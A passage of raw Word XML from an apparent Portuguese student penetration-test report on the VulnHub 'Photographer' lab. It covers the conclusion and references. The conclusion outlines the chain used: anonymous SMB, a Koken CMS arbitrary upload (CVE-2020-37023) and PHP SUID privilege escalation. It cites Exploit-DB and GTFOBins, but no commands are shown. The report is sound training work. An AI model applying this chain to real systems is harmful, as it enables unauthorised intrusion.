      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> profissional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71196465" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="762D783D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>13 CONCLUSÃO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496ABE9C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O presente exercício demonstrou, na prática, como uma cadeia de vulnerabilidades aparentemente simples pode levar ao comprometimento total de um sistema. Partindo de um compartilhamento SMB com acesso anônimo, foi possível obter credenciais válidas, acessar um painel administrativo, explorar uma vulnerabilidade conhecida de upload arbitrário e, finalmente, escalar privilégios para root em poucos passos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1F49A8" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A máquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ilustra com clareza os riscos de configurações padrão inseguras, software desatualizado e senhas fracas, vulnerabilidades que, individualmente, poderiam parecer de baixo impacto, mas que, encadeadas, resultaram no comprometimento completo do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E59637D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do ponto de vista da formação profissional, o exercício proporcionou experiência prática nas principais fases de um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> real: reconhecimento, enumeração, exploração, pós-exploração e documentação. A utilização de ferramentas profissionais como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> em cenário controlado contribuiu significativamente para o desenvolvimento das competências técnicas necessárias ao analista de segurança.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164A6165" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O alinhamento das vulnerabilidades identificadas ao OWASP Top 10 2025 e às classificações CVE/CWE demonstra a relevância prática do conteúdo teórico da disciplina, evidenciando que as falhas encontradas em laboratório são as mesmas que afetam sistemas reais em produção ao redor do mundo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E870EE6" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="5E5351AA" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>REFERÊNCIAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D70C4DE" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>BRASIL. Lei n. 14.155, de 27 de maio de 2021. Altera o Decreto-Lei n. 2.848, de 7 de dezembro de 1940 (Código Penal). Diário Oficial da União, Brasília, DF, 28 maio 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D57E2" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="0E614DC6" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00F85848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE CORPORATION. CVE-2020-37023: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CMS 0.22.24 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Arbitrary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> File Upload. Disponível em: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-37023. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Acesso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 11 jun. 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F16225" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00F85848" w:rsidRDefault="00DA7219">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584F0EA4" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY. NVD — National Vulnerability Database: CVE-2020-37023. </w:t>
      </w:r>
      <w:r>
        <w:t>Disponível em: https://nvd.nist.gov/vuln/detail/CVE-2020-37023. Acesso em: 11 jun. 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF18450" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="2B6DEFFE" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00F85848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP FOUNDATION. OWASP Top 10 — 2025. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disponível</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: https://owasp.org/www-project-top-ten/. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Acesso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 11 jun. 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339CB1B9" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00F85848" w:rsidRDefault="00DA7219">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5AE6DE" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OFFENSIVE SECURITY. Exploit-DB: EDB-ID 48706 — Koken CMS 0.22.24 Arbitrary File Upload. </w:t>
      </w:r>
      <w:r>
        <w:t>Disponível em: https://www.exploit-db.com/exploits/48706. Acesso em: 11 jun. 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43579243" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="1192F659" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VULNHUB. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 1. Disponível em: https://www.vulnhub.com/entry/photographer-1,519/. Acesso em: 11 jun. 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E017E49" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="2A569B13" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00F85848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GTFOBINS. PHP — SUID. Disponível em: https://gtfobins.github.io/gtfobins/php/#suid. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Acesso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 11 jun. 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787F899" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00F85848" w:rsidRDefault="00DA7219">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1658F77A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE CORPORATION. CWE-434: Unrestricted Upload of File with Dangerous Type. </w:t>
      </w:r>
      <w:r>
        <w:t>Disponível em: https://cwe.mitre.org/data/definitions/434.html. Acesso em: 11 jun. 2026.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DA7219">
      <w:headerReference w:type="default" r:id="rId29"/>
      <w:footerReference w:type="default" r:id="rId30"/>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2A1D" w14:textId="77777777" w:rsidR="003F66A3" w:rsidRDefault="003F66A3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="061ABC0B" w14:textId="77777777" w:rsidR="003F66A3" w:rsidRDefault="003F6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7B17" w14:textId="77777777" w:rsidR="00DA7219"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F85848">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85848">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86E76" w14:textId="77777777" w:rsidR="003F66A3" w:rsidRDefault="003F66A3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7FAF5803" w14:textId="77777777" w:rsidR="003F66A3" w:rsidRDefault="003F6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66F3" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="888888"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Relatório de </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Pentest</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> — </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Photographer</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>VulnHub</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87BBE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6745A26"/>
    <w:lvl w:ilvl="0" w:tplc="D74AE3E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E8AA5350">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8512919C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8E00347E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3BC8B4D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CE84169E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2668E358">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="37B6D094">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="357A087E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="33811628"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="700A970C"/>
    <w:lvl w:ilvl="0" w:tplc="4DBA29E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D1C2B04A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="926227F6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5AA8687A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="90FA37D0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="823CA4BE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9E9C61DC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A90E2C2A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D4821878">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1048458248">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="10892293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219"/>
    <w:rsid w:val="0008596B"/>
    <w:rsid w:val="00160C19"/>
    <w:rsid w:val="00353B3F"/>
    <w:rsid w:val="003C04EF"/>
    <w:rsid w:val="003F66A3"/>
    <w:rsid w:val="009F6024"/>
    <w:rsid w:val="00AD472E"/>
    <w:rsid w:val="00BC1FC8"/>
    <w:rsid w:val="00C220DF"/>
    <w:rsid w:val="00DA7219"/>
    <w:rsid w:val="00EA346D"/>
    <w:rsid w:val="00F815F7"/>
    <w:rsid w:val="00F858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9F51"/>
  <w15:docId w15:val="{62F75E0C-2398-4771-B72C-897E622B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FC8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="480" w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="360" w:after="180"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="24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9F6024"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F815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192.168.56.102:8000/api.php?/content/last" TargetMode="External"/><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v1n1v131r4.com" TargetMode="External"/><Relationship Id="rId30"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27</Pages>
  <Words>3967</Words>
  <Characters>21423</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UCB - APSo - Felipe Bonfim Pontes</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-08T19:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-12T00:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>